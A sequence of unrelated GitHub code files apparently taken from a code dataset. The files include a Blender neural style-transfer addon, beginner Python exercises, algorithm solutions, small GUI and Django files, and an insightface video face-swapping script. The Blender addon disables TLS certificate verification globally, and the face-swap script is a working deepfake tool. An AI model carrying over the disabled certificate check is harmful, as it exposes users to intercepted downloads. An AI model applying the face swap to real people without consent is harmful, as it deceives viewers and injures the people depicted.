\"\n\n def execute(self, context):\n bpy.ops.import_test.some_data('INVOKE_DEFAULT')\n return {'FINISHED'}\n\n# Main Class whole addon is contained here\nclass StyleTransfer_OT_Operator(bpy.types.Operator):\n bl_idname = \"view3d.cursor_center\"\n bl_label = \"Simple operator\"\n bl_description = \"Center 3d cursor\"\n\n content = \"\"\n style = \"\"\n resolution = \"\"\n iterations = \"\"\n\n # image converter\n def im_convert(self, tensor):\n image = tensor.to(\"cpu\").clone().detach()\n image = image.numpy().squeeze()\n image = image.transpose(1, 2, 0)\n image = image * np.array((0.5, 0.5, 0.5)) + np.array((0.5, 0.5, 0.5))\n image = image.clip(0, 1)\n\n return image\n\n # main function\n def execute(self, context):\n # fix for linux ssl error in vgg downloading\n ssl._create_default_https_context = ssl._create_unverified_context\n\n # downloading and declaration of vgg19 model\n vgg19 = models.vgg19(pretrained=True).features\n\n # get number of iterations and resolution value from UI field\n iterations = int(self.iterations)\n resolution = int(self.resolution)\n\n # start loading indicator on cursor\n wm.progress_begin(0, iterations)\n\n for param in vgg19.parameters():\n param.requires_grad_(False)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n vgg19.to(device)\n\n # load image, resize to resolution set by UI and normalize it to tensor\n def load_image(img_path, max_size=resolution, shape=None):\n image = PIL.Image.open(img_path).convert('RGB')\n if max(image.size) > max_size:\n size = max_size\n else:\n size = max(image.size)\n\n if shape is not None:\n size = shape\n\n in_transform = transforms.Compose([\n transforms.Resize(size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5))])\n\n image = in_transform(image).unsqueeze(0)\n\n return image\n\n # load content from file\n self.content = bpy.path.abspath(self.content)\n self.content.replace('\\\\', '/')\n\n self.style = bpy.path.abspath(self.style)\n self.style.replace('\\\\', '/')\n\n c = load_image(self.content).to(device)\n s = load_image(self.style).to(device)\n\n # VGG19\n def features(image, model):\n\n layers = {'0': 'conv1_1', '5': 'conv2_1', '10': 'conv3_1', '19': 'conv4_1', '21': 'conv4_2',\n '28': 'conv5_1'}\n\n features = {}\n\n for name, layer in model._modules.items():\n image = layer(image)\n if name in layers:\n features[layers[name]] = image\n\n return features\n\n content_features = features(c, vgg19)\n style_features = features(s, vgg19)\n\n # Gram Matrix\n def gram(tensor):\n _, d, h, w = tensor.size()\n tensor = tensor.view(d, h * w)\n gram = torch.mm(tensor, tensor.t())\n return gram\n\n style_grams = {layer: gram(style_features[layer]) for layer in style_features}\n style_weights = {'conv1_1': 1.,\n 'conv2_1': 0.75,\n 'conv3_1': 0.2,\n 'conv4_1': 0.2,\n 'conv5_1': 0.2}\n\n content_weight = 1 # alpha\n style_weight = 1e6 # beta\n\n target = c.clone().requires_grad_(True).to(device)\n\n # set up optimizer\n optimizer = optim.Adam([target], lr=0.003)\n\n # main loop (for every iteration)\n for j in range(1, iterations + 1):\n # update progress indicator\n wm.progress_update(j)\n # get features from a target (content image)\n target_features = features(target, vgg19)\n #reset style loss\n style_loss = 0\n\n # inner loop (for every layer from VGG19) to count style loss\n # style loss i result of a combined loss from five different layers within our model\n for layer in style_weights:\n # collect target feature\n target_feature = 
target_features[layer]\n                # apply gram matrix function to our target\n                target_gram = gram(target_feature)\n                # apply gram matrix function to our style\n                style_gram = style_grams[layer]\n                # depth, height, width\n                _, d, h, w = target_feature.shape\n                # calculate weighted average of loss\n                style_loss += self.MSE(layer, style_gram, style_weights, target_gram) / (d * h * w)\n\n            total_loss = content_weight * self.calc_content_loss(content_features, target_features) + style_weight * style_loss\n\n            optimizer.zero_grad()\n            total_loss.backward()\n            optimizer.step()\n\n        # Image information. Change these to your liking.\n        NAME = 'Procedural Image'\n        WIDTH = 64\n        HEIGHT = 64\n        USE_ALPHA = True\n        newImage = bpy.data.images.new(NAME, WIDTH, HEIGHT, alpha=USE_ALPHA)\n\n        wm.progress_end()\n\n        im = Img.fromarray((self.im_convert(target) * 255).astype(np.uint8))\n\n        # parse PIL Image to blender bpy.data\n        im.save(self.content)\n        newImage = bpy.data.images.load(self.content)\n        newImage.update()\n\n        # Make all UV/Image Editor views show the new image.\n        for area in bpy.context.screen.areas:\n            if area.type == 'IMAGE_EDITOR':\n                for space in area.spaces:\n                    if space.type == 'IMAGE_EDITOR':\n                        space.image = newImage\n\n\n        return {'FINISHED'}\n\n    def MSE(self, layer, style_gram, style_weights, target_gram):\n        return style_weights[layer] * torch.mean((target_gram - style_gram) ** 2)\n\n    def calc_content_loss(self, content_features, target_features):\n        return torch.mean((target_features['conv4_2'] - content_features['conv4_2']) ** 2)\n\n\n","repo_name":"pIuszak/blender-pytorch-style-transfer","sub_path":"style_transfer_op.py","file_name":"style_transfer_op.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} {"seq_id":"44167582280","text":"\"\"\"\nhttps://docs.python.org/3/library/stdtypes.html#built-in-types\n\nBuilt-in functions are Python's native, i.e. integrated (internal), functions.\nThere are several built-in functions for different data types.\nIt is also possible to customize these functions.\n\"\"\"\n\n# Imagine we want to build a simple calculator that only performs addition.\n# 1st Solution\n\nnum1 = input('Enter the 1st number: ')\nnum2 = input('Enter the 2nd number: ')\n\nif num1.isnumeric() and num2.isnumeric(): # quite a limited function\n    print(int(num1) + int(num2))\nelse:\n    print('Could not convert the values.')\n\n# 2nd Solution\n\ntry:\n    num1 = input('Enter the 1st number: ')\n    num2 = input('Enter the 2nd number: ')\n\n    print(int(num1) + int(num2))\nexcept:\n    print('Could not convert the values.')\n\n# 3rd Solution\n\nimport re\n\ndef is_float(val):\n    if isinstance(val, float): return True\n    if re.search(r'^\-{,1}[0-9]+\.{1}[0-9]+$', val): return True\n    \n    return False\n    \ndef is_int(val):\n    if isinstance(val, int): return True\n    if re.search(r'^\-{,1}[0-9]+$', val): return True\n    \n    return False\n    \ndef is_number(val):\n    return is_int(val) or is_float(val)\n\n\nnum1 = input('Enter the 1st number: ')\nnum2 = input('Enter the 2nd number: ')\n\nif is_number(num1) and is_number(num2): # custom function\n    num1 = float(num1)\n    num2 = float(num2)\n    print(num1 + num2)\nelse:\n    print('Could not convert the values.')\n    
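# note: is_number accepts ints and floats (including negatives), so inputs like '3.5' or '-2' are summed as floats\n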
","repo_name":"WillJR183/python_learnings","sub_path":"python_basico_logica_programacao/aula13_funcoes_built_in.py","file_name":"aula13_funcoes_built_in.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24763490614","text":"## PSEUDO CODE####\n\nimport pandas as pd\n\ndef calc_nets(train_loader, net, optimizer, criterion):\n\n nets_df=pd.DataFrame()\n\n for train_sample in train_loader:\n optimizer.zero_grad()\n outputs = net(train_sample[0].cuda())\n loss = criterion(outputs[0], train_sample[1].cuda())\n loss.backward()\n\n grad=net.grads\n outputs=net.outputs\n preds=outputs\n\n temp_df=pd.DataFrame({'grad':grad, 'outputs':outputs, 'preds': preds})\n nets_df.append(temp_df)\n\n return nets_df\n\n## CREATE TRUE AND FALSE LABELS\n\n## LOSS\n## GRAD\n## PREDICTION\n## TRUE LABELS\n## LAYER","repo_name":"zhsegal/WhiteBox","sub_path":"calc_nets.py","file_name":"calc_nets.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29007455188","text":"# https://practice.geeksforgeeks.org/problems/add-1-to-a-number-represented-as-linked-list/1\n\n# Python3 recursive solution\n'''\nclass Node:\n def __init__(self, data): # data -> value stored in node\n self.data = data\n self.next = None\n'''\ndef addOne(head):\n def recursiveAdd(node): # recursively add 1 to the linked list\n if node is None:\n return 1\n carry = recursiveAdd(node.next)\n var = (node.data + carry) % 10\n carry = (node.data + carry) // 10\n node.data = var\n return carry\n \n carry = recursiveAdd(head)\n if carry: # if carry is left over (cases like 99999 + 1)\n node = Node(carry)\n node.next = head\n head = node\n return head\n\n# cpp solution using linked list reversal\n'''\n/* Node structure\nstruct Node {\n int data;\n Node* next;\n}; */\n\nNode* reverse(Node* head) {\n if (head == nullptr || head->next == nullptr)\n return head;\n Node* child = head->next;\n Node* var; head->next = nullptr;\n while (child != nullptr) {\n var = child->next;\n child->next = head;\n head = child;\n child = var;\n }\n return head;\n}\n\n// Returns new head of linked List.\nNode *addOne(Node *head) {\n head = reverse(head);\n Node* root = head;\n int carry = 1;\n while(root != nullptr) {\n int var = (root->data + carry) / 10;\n root->data = (root->data + carry) % 10;\n carry = var;\n if (root->next == nullptr)\n break;\n root = root->next;\n }\n \n if (carry > 0) {\n root->next = new Node;\n root->next->data = carry;\n }\n \n return reverse(head);\n}\n'''","repo_name":"harshraj22/problem_solving","sub_path":"solution/geeksforgeeks/Add1ToANumberRepresentedAsLinkedList.py","file_name":"Add1ToANumberRepresentedAsLinkedList.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"37636568941","text":"NO_PREDICTION_MODEL_SELECTED = \"Please select a prediction model!\"\nERROR_GET_MODEL_LIST_FAILED = \"Getting the prediction model list failed!\"\nERROR_GET_MODEL_DESCRIPTION_DETAILS_FAILED = (\n \"Getting the prediction model description failed!\"\n)\nERROR_PREDICTION_MODEL_FAILED = \"The selected prediction model is unable to start!\"\nERROR_REQUIRED_INPUT_NOT_FOUND = \"Please check all the input parameters! 
Missing:\"\nERROR_GET_DATA_FROM_FHIR_FAILED = (\n \"Please check the selected fhir endpoint or provided patient id!\"\n)\nERROR_INPUT_DATA_SAVE_FAILED = \"The model input cannot be saved, please inform IT!\"\nERROR_PROVIDED_SESSION_TOKEN_INVALID = \"The provided session token was not valid!\"\nERROR_PREDICTION_CALCULATION = \"Error in prediction calculation, please inform IT!\"\nERROR_UNKNOWN = \"Something went wrong please inform IT!\"\nWARNING_SESSION_ENDED = \"The advanced view feature is disabled for this session, please restart to enable this again.\"\n","repo_name":"MaastrichtU-CDS/cdse-core","sub_path":"predictionmodel/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6551840851","text":"# QUESTION 4.1:\n# I have a list of things I need to buy from my supermarket of choice.\n# shopping_list = [\n# \"oranges\",\n# \"cat food\",\n# \"sponge cake\",\n# \"long-grain rice\",\n# \"cheese board\",\n# ]\n#\n# print(shopping_list[1])\n#\n# I want to know what the first thing I need to buy is.\n# However, when I run the program it shows me a different answer to what I was expecting?\n# What is the mistake? How do I fix it?\n\n# ANSWER:\n# Change index from 1 to 0.\n# Indexes always start at 0, so shopping_list[0] will give first item.\n\nshopping_list = [\n \"oranges\",\n \"cat food\",\n \"sponge cake\",\n \"long-grain rice\",\n \"cheese board\",\n]\n\nprint(shopping_list[0])\n\n","repo_name":"NatalieJClark/pythonHomeworks","sub_path":"question4.1.py","file_name":"question4.1.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14106237784","text":"class Solution:\n def minFallingPathSum(self, matrix: List[List[int]]) -> int:\n def goDp(matrix, dp, x, y):\n if x == 0:return matrix[x][y]\n if dp[x][y] > -(101 * 101):return dp[x][y]\n minVal = 101 * 101\n for dy in [-1, 0, 1]:\n if y + dy < 0 or y + dy > len(matrix) - 1:continue\n minVal = min(minVal, matrix[x][y] + goDp(matrix, dp, x - 1, y + dy))\n dp[x][y] = minVal\n return minVal\n \n dp = [[-(101 * 101)] * len(matrix) for _ in range(len(matrix))]\n ans = 101 * 101\n for i in range(len(matrix)):\n ans = min(ans, goDp(matrix, dp, len(matrix) - 1, i))\n return ans","repo_name":"Sol-cito/LeetCoding","sub_path":"931-minimum-falling-path-sum/931-minimum-falling-path-sum.py","file_name":"931-minimum-falling-path-sum.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2857290066","text":"import csv\r\nfrom functools import partial\r\nimport pandas as pd\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport tkinter.messagebox\r\nimport os\r\nfrom time import strftime\r\nfrom datetime import datetime\r\nimport time\r\nimport pyrebase\r\nimport mysql.connector\r\nfrom PIL.ImageTk import PhotoImage\r\nfrom envVar import firebaseConfig as fc\r\n\r\n\r\nfirebase=pyrebase.initialize_app(fc)\r\ndb= firebase.database()\r\n\r\ndef back():\r\n root.destroy()\r\n import LoginPage\r\n\r\nroot=Tk()\r\nroot.geometry(\"1100x700+290+55\")\r\nroot.minsize(1100, 700)\r\nroot.maxsize(1100, 700)\r\nroot.configure(bg='navy')\r\nroot.title(\"Registration Page\")\r\np1 = PhotoImage(file='[DIGICURE MAIN LOGO].png')\r\nroot.iconphoto(FALSE, p1)\r\n#---Entry Format----#\r\nshop = StringVar()\r\npro = StringVar()\r\naddress = 
StringVar()\r\nmob = StringVar()\r\n#--Heading--#\r\nhead_frame = Frame(root, bg='DarkGoldenRod1', borderwidth=10, relief=RAISED, width=500, height=55)\r\nhead_frame.pack(side=TOP, fill=X)\r\nheading = Label(head_frame, text=\"----Please Fill The Details Below----\", bg='DarkGoldenRod1', fg='black', font=\"Helvetica 20 bold\")\r\nheading.pack()\r\n#---Main Content---#\r\nmain_frame = Frame(root, bg='DarkGoldenrod1', borderwidth=8, relief=SUNKEN, width=520, height=285)\r\nmain_frame.place(x=300, y=155)\r\nshopName = Label(main_frame, fg='black', bg='DarkGoldenRod1', font=\"Consolas 20 bold\", text=\"Shop Name:-\")\r\nshopName.place(x=10, y=25)\r\nshopEntry = Entry(main_frame, borderwidth=4, relief=RIDGE, font=\"Helvetica 18 bold\", width=20)\r\nshopEntry.place(x=210, y=25)\r\npropName = Label(main_frame, fg='black', bg='DarkGoldenRod1', font=\"Consolas 20 bold\", text=\"Proprietor:-\")\r\npropName.place(x=10, y=85)\r\npropEntry = Entry(main_frame, borderwidth=4, relief=RIDGE, font=\"Helvetica 18 bold\", width=20)\r\npropEntry.place(x=210, y=85)\r\naddress = Label(main_frame, fg='black', bg='DarkGoldenRod1', font=\"Consolas 20 bold\", text=\"Address:-\")\r\naddress.place(x=10, y=145)\r\naddEntry = Entry(main_frame, borderwidth=4, relief=RIDGE, font=\"Helvetica 18 bold\", width=20)\r\naddEntry.place(x=210, y=145)\r\nmobile = Label(main_frame, fg='black', bg='DarkGoldenRod1', font=\"Consolas 20 bold\", text=\"Mobile No.:-\")\r\nmobile.place(x=10, y=205)\r\nmobEntry = Entry(main_frame, borderwidth=4, relief=RIDGE, font=\"Helvetica 18 bold\", width=20)\r\nmobEntry.place(x=210, y=205)\r\n\r\nReg_btn_frame = Frame(root, borderwidth=6, relief=SUNKEN, bg=\"DarkGoldenrod1\")\r\nReg_btn_frame.place(x=490, y=490)\r\nReg_btn = Button(Reg_btn_frame, text=\"Register\", bg=\"navy\", borderwidth=4, relief=RIDGE,\r\n font=\"Arial 18 bold\", fg='DarkGoldenrod1', command=None)\r\nReg_btn.pack()\r\n\r\nback_btn_frame = Frame(root, borderwidth=4, relief=SUNKEN, bg=\"DarkGoldenrod1\")\r\nback_btn_frame.place(x=1, y=55)\r\nback_btn = Button(back_btn_frame, text=\"Back\", bg=\"navy\", borderwidth=2, relief=RIDGE,\r\n font=\"Arial 18 bold\", fg='DarkGoldenrod1', command=back).pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"aritraM23/Fund-Management-System","sub_path":"DataEntry.py","file_name":"DataEntry.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36531651433","text":"import numpy as np\nfrom FinalChallengePy.Utils.GeomUtils import GeomUtils\n\nclass LocalGlobalUtils:\n @staticmethod\n def globalToLocal(state, globalPoint):\n translatedPoint = globalPoint - state.getPosition()\n\n # rotate into the up frame of reference\n angle = np.arccos(state.getOrientation()[1]) \\\n * np.sign(state.getOrientation()[0])\n\n return GeomUtils.rotateVector(translatedPoint, angle)\n\n @staticmethod\n def localToGlobal(state, localPoint):\n angle = - np.arccos(state.getOrientation()[1]) \\\n * np.sign(state.getOrientation()[0])\n\n translatedPoint = GeomUtils.rotateVector(localPoint, angle)\n\n return translatedPoint + state.getPosition()\n","repo_name":"sportdeath/maze_solver","sub_path":"src/maze_solver/utils/LocalGlobalUtils.py","file_name":"LocalGlobalUtils.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38557100384","text":"import cv2\nimport numpy as np\nimport insightface\nimport os\nimport torch\nfrom 
numpy.linalg import norm\nfrom insightface.app import FaceAnalysis\nfrom moviepy.editor import *\n\ndef create_directories(output_folder, final_output_folder):\n dir_names = [output_folder, final_output_folder]\n for dir_name in dir_names:\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n print(f\"Directory {dir_name} created.\")\n else:\n print(f\"Directory {dir_name} already exists.\")\n\ndef initialize_insightface(model_path):\n app = FaceAnalysis(providers=['CUDAExecutionProvider', 'CPUExecutionProvider'])\n app.prepare(ctx_id=0, det_size=(640, 640))\n swapper = insightface.model_zoo.get_model(model_path, download=False, download_zip=False)\n return app, swapper\n\nfrom concurrent.futures import ThreadPoolExecutor\n\n\n\ndef process_frame(frame, frame_count, output_folder, app, swapper, source_face, frame_photo_face_features):\n faces = app.get(frame)\n for face in faces:\n face_features = face.normed_embedding\n\n # Calculate cosine similarity\n similarity = np.dot(face_features, frame_photo_face_features.T) / (norm(face_features) * norm(frame_photo_face_features))\n\n # Adjust the threshold for cosine similarity (you may need to experiment with this value)\n if similarity > 0.3: \n frame = swapper.get(frame, face, source_face[0], paste_back=True)\n\n frame_filename = os.path.join(output_folder, f\"frame_{frame_count}.png\")\n cv2.imwrite(frame_filename, frame)\n\ndef read_and_process_video(video_path, output_folder, app, swapper, source_face_dict):\n cap = cv2.VideoCapture(video_path)\n if not cap.isOpened():\n print(\"Error: Could not open video.\")\n return\n\n frame_count = 0\n while True:\n ret, frame = cap.read()\n if not ret:\n print(\"Video has ended.\")\n break\n\n all_faces_similar = True # Initialize flag to True for each frame\n\n faces = app.get(frame)\n for face in faces:\n face_features = face.normed_embedding\n face_similar = False # Initialize a flag for individual face similarity\n\n for frame_photo_name, (source_face, frame_photo_face_features) in source_face_dict.items():\n #similarity = np.dot(face_features, frame_photo_face_features.T)\n similarity = np.dot(face_features, frame_photo_face_features.T) / (norm(face_features) * norm(frame_photo_face_features))\n if similarity > 0.3:\n frame = swapper.get(frame, face, source_face[0], paste_back=True)\n face_similar = True # Set individual face similarity flag to True\n break # No need to check further for this face\n\n if not face_similar: # If this face is not similar to any source face\n all_faces_similar = False # Set the overall frame flag to False\n break # No need to check further for this frame\n\n if all_faces_similar: # If all faces in the frame are similar to some source face\n frame_filename = os.path.join(output_folder, f\"frame_{frame_count}.png\")\n cv2.imwrite(frame_filename, frame)\n frame_count += 1\n\n cap.release()\n cv2.destroyAllWindows()\n\n\ndef process_single_image(image_path, output_folder, app, swapper, source_face_dict):\n img = cv2.imread(image_path)\n if img is None:\n print(\"Error: Could not read image.\")\n return\n\n faces = app.get(img)\n for face in faces:\n face_features = face.normed_embedding\n for frame_photo_name, (source_face, frame_photo_face_features) in source_face_dict.items():\n similarity = np.dot(face_features, frame_photo_face_features.T)\n if similarity > 0.5:\n img = swapper.get(img, face, source_face[0], paste_back=True)\n\n output_filename = os.path.join(output_folder, \"output_image.png\")\n cv2.imwrite(output_filename, img)\n\ndef 
reassemble_video(output_folder, original_video_path, final_output_folder):\n # Get frame rate of original video\n cap = cv2.VideoCapture(original_video_path)\n if not cap.isOpened():\n print(\"Error: Could not open original video.\")\n return\n frame_rate = int(cap.get(cv2.CAP_PROP_FPS))\n cap.release()\n\n # Get dimensions of the first frame\n first_frame_path = os.path.join(output_folder, \"frame_0.png\")\n img = cv2.imread(first_frame_path)\n if img is None:\n print(\"Error: Could not read the first frame.\")\n return\n height, width, _ = img.shape\n\n # Initialize VideoWriter with the path in the final_output_folder\n output_file_path = os.path.join(final_output_folder, 'output_video.mp4')\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n out = cv2.VideoWriter('temp_video.mp4', fourcc, frame_rate, (width, height))\n\n frame_count = len([name for name in os.listdir(output_folder) if os.path.isfile(os.path.join(output_folder, name))])\n\n # Write frames into the video\n for i in range(frame_count):\n frame_path = os.path.join(output_folder, f\"frame_{i}.png\")\n frame = cv2.imread(frame_path)\n if frame is None:\n print(f\"Error: Could not read frame_{i}. Skipping this frame.\")\n continue\n out.write(frame)\n\n out.release()\n\n # Extract audio from the original video\n video = VideoFileClip(original_video_path)\n audio = video.audio\n audio.write_audiofile(\"temp_audio.mp3\")\n\n # Merge audio and reassembled video\n final_video = VideoFileClip(\"temp_video.mp4\")\n final_video = final_video.set_audio(AudioFileClip(\"temp_audio.mp3\"))\n final_video.write_videofile(output_file_path) # Changed to output_file_path\n\n # Remove temporary files\n os.remove(\"temp_video.mp4\")\n os.remove(\"temp_audio.mp3\")\n\n print(\"Video reassembled successfully with audio.\")\n\n\ndef clear_gpu_memory(app, swapper):\n del app\n del swapper\n torch.cuda.empty_cache()\n\nimport argparse\n\ndef main(args):\n \n\n app, swapper = initialize_insightface(args.model_path)\n\n source_face_dict = {}\n for source_img_path, frame_img_path in zip(args.source_images, args.frame_images):\n source_img = cv2.imread(source_img_path)\n source_face = app.get(source_img)\n frame_photo = cv2.imread(frame_img_path)\n frame_photo_face = app.get(frame_photo)\n frame_photo_face_features = frame_photo_face[0].normed_embedding\n source_face_dict[frame_img_path] = (source_face, frame_photo_face_features)\n\n output_folder = args.output_folder\n final_output_folder = args.final_output_folder\n create_directories(output_folder,final_output_folder)\n\n if args.process_type == \"video\":\n read_and_process_video(args.video_path, output_folder, app, swapper, source_face_dict)\n reassemble_video(output_folder, args.video_path, args.final_output_folder)\n elif args.process_type == \"image\":\n process_single_image(args.image_path, output_folder, app, swapper, source_face_dict)\n\n clear_gpu_memory(app, swapper)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Face Swapping Script')\n parser.add_argument('--model_path', type=str, help='Path to the model')\n parser.add_argument('--source_images', type=str, nargs='+', help='Paths to source images')\n parser.add_argument('--frame_images', type=str, nargs='+', help='Paths to frame images')\n parser.add_argument('--output_folder', type=str, help='Path to output frames folder')\n parser.add_argument('--final_output_folder', type=str, help='Path to final output folder')\n parser.add_argument('--video_path', type=str, help='Path to the video file')\n 
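# note: exactly one of --video_path / --image_path is consumed by main(), selected by --process_type\n    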
parser.add_argument('--image_path', type=str, help='Path to the image file')\n    parser.add_argument('--process_type', type=str, choices=['video', 'image'], help='Type of processing: \"video\" or \"image\"')\n\n    args = parser.parse_args()\n    main(args)\n","repo_name":"allthingssecurity/anukriti","sub_path":"anukriti.py","file_name":"anukriti.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37036588709","text":"from django.urls import path\n\nfrom webapp.views import IndexView, AdCreateView, AdToDeleteView, DeactivatedListView, AdActivateView, AdListView, \\\n    AdToDeleteFromListView\n\napp_name = 'webapp'\n\n\nurlpatterns = [\n    path('', IndexView.as_view(), name='index'),\n    path('ad_create/<int:pk>/', AdCreateView.as_view(), name='ad_create'),\n    path('ad_to_delete/<int:pk>/', AdToDeleteView.as_view(), name='ad_to_delete'),\n    path('ad_to_delete_from_list/<int:pk>/', AdToDeleteFromListView.as_view(), name='ad_to_delete_from_list'),\n    path('ad_activate/<int:pk>/', AdActivateView.as_view(), name='ad_activate'),\n    path('deactivated/', DeactivatedListView.as_view(), name='deactivated_list'),\n    path('ad_list/', AdListView.as_view(), name='ad_list'),\n\n    # path('product/add/', ProductCreateView.as_view(), name='product_create'),\n    # path('product/<int:pk>/update/', ProductUpdateView.as_view(), name='product_update'),\n    # path('product/<int:pk>/delete/', ProductDeleteView.as_view(), name='product_delete'),\n    # path('product_category/', ProductListView.as_view(), name='products_category'),\n    # path('product_sub_category/', ProductSubCategoryListView.as_view(), name='products_sub_category'),\n    # path('product_list/', ProductListGetView.as_view(), name='products_list_get'),\n    # path('product/add-to-favorites/', AddToFavorites.as_view(), name='add_to_favorites'),\n    # path('product/delete-from-favorites/', DeleteFromFavorites.as_view(), name='delete_from_favorites'),\n    # path('products_favorites/', FavoritesList.as_view(), name='favorite_products'),\n    # path('product/add-to-offer/', AddToOffer.as_view(), name='add_to_offer'),\n    # path('product/delete-from-offer/', DeleteFromOffer.as_view(), name='delete_from_offer'),\n    # path('products_in_offer/', ProductsOfferListView.as_view(), name='offer_products'),\n]","repo_name":"aydarbekov/bizbirge.biz","sub_path":"source/webapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44234097907","text":"def decodeString(s):\n    limiter = {'open': '[', 'close': ']'}\n    stack = []\n    n = len(s)\n\n    for i in range(n):\n        if s[i] == limiter['close']:\n            temp = ''\n\n            while stack[-1] != limiter['open']:\n                temp = stack.pop() + temp\n\n            stack.pop()\n\n            n = ' '  # seed with whitespace; int() strips it when parsing the repeat count\n            while len(stack) and stack[-1].isnumeric():\n                n = stack.pop() + n\n            n = int(n)\n\n            temp = temp * n\n            stack.append(temp)\n        else:\n            stack.append(s[i])\n\n    return stack[0]\n\n\nif __name__ == '__main__':\n    print(decodeString('2[a2[b]c]'))\n    # abbcabbc\n","repo_name":"silvioedu/TechSeries-Daily-Interview","sub_path":"day59/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70310284994","text":"\"\"\"\nWell described in https://www.youtube.com/watch?v=kHWy5nEfRIQ\n\"\"\"\nfrom algo import dynamic_programming\n\n\nclass NativeSolution(object):\n    @staticmethod\n    def next_step(current, towers):\n        \"\"\"\n        The 
following algorithm will try to identify the next best step\n        :param current:\n        :param towers:\n        :return:\n        \"\"\"\n        # print(\">>>> {}->{} of {}\".format(current, towers[current], towers))\n\n        # check if the next jump is already capable of passing the entire list\n        if current + towers[current] >= len(towers):\n            return current + towers[current]\n\n        # create a new sub list from the current -> farthest jump by current value\n        sub = towers[current + 1: current + towers[current] + 1]\n        # create new list calculating each entity with the position and value\n        options = []\n        for i, v in enumerate(sub):\n            if v == 0:\n                options.append(v)\n            else:\n                options.append(v + i)\n\n        # if new list is not empty calculate the new current by adding the max value position to the current position\n        if options:\n            sub_next = options.index(max(options))\n            current += sub_next + 1\n\n        # print(\"sub {} options {} best {}\".format(sub, options, current))\n        return current\n\n\n    @staticmethod\n    def is_hopable(towers):\n        \"\"\"\n        Check if a given seq can be hopped, i.e. a user starting at position 0 is able to jump outside the seq\n        :param towers: list of integers describes set of towers\n        :return: Boolean\n        \"\"\"\n\n        # assumptions: List can't be empty or start with zero\n        if len(towers) == 0 or towers[0] == 0:\n            return False\n\n        print(\"Testing {}\".format(towers))\n        current = 0\n        count = 0\n        while True:\n            if current >= len(towers):\n                print(\"hopping with {} numbers of jumps\".format(count))\n                return True\n            if towers[current] == 0:\n                return False\n            count += 1\n            current = NativeSolution.next_step(current, towers)\n\n\nclass GraphDFSSolution(object):\n    \"\"\"\n    # http://eddmann.com/posts/depth-first-search-and-breadth-first-search-in-python/\n    # https://gist.github.com/professormahi/cff4bfeaece05966e688658127bf41f3\n\n    Graph approach (https://www.youtube.com/watch?v=zaBhtODEL0w)\n    DFS (Depth First Search)\n    It dives deep into each root tree and asks hasPath(s, t)\n    The major disadvantage is that we might end up diving into one root when we have the node we are looking\n    for right at the second root\n    Implementation: simple recursive algorithm passing a \"visited\" set to avoid an infinite loop\n    \"\"\"\n    @staticmethod\n    def is_hopable(towers, current=0, visited=None):\n        # completed from the description above: recursive DFS over reachable indices;\n        # escaping past the end of the list means the sequence is hopable\n        if len(towers) == 0:\n            return False\n        if current >= len(towers):\n            return True\n        if visited is None:\n            visited = set()\n        if current in visited or towers[current] == 0:\n            return False\n        visited.add(current)\n        return any(GraphDFSSolution.is_hopable(towers, current + step, visited)\n                   for step in range(1, towers[current] + 1))\n\n\nclass GraphBFSSolution(object):\n    \"\"\"\n    # http://eddmann.com/posts/depth-first-search-and-breadth-first-search-in-python/\n    # https://gist.github.com/professormahi/cff4bfeaece05966e688658127bf41f3\n    \n    BFS (Breadth First Search)\n    Go wider before we go deep, which we do by asking the first child whether one of its direct children is\n    the node we are looking for.\n    Implementation: using a \"queue\" - once we have asked all the direct children, we add them to the queue\n    \"\"\"\n    @staticmethod\n    def is_hopable(towers):\n        # completed from the description above: iterative BFS with a FIFO queue\n        if len(towers) == 0 or towers[0] == 0:\n            return False\n        queue = [0]\n        visited = {0}\n        while queue:\n            current = queue.pop(0)\n            if current + towers[current] >= len(towers):\n                return True\n            for step in range(1, towers[current] + 1):\n                nxt = current + step\n                if nxt not in visited and towers[nxt] != 0:\n                    visited.add(nxt)\n                    queue.append(nxt)\n        return False\n\n\nclass DynamicProgrammingSolution(object):\n    \"\"\"\n    The classic question is \"minimum number of jumps to reach the end\" and\n    can be found at https://www.geeksforgeeks.org/minimum-number-of-jumps-to-reach-end-of-a-given-array/\n    We added a small change to make it serve our purpose\n\n    Time Complexity: O(n^2)\n    \"\"\"\n    @staticmethod\n    @dynamic_programming\n    def is_hopable(towers):\n        # converting the classic \"min jumps to index...\" algorithm into our is_hopable 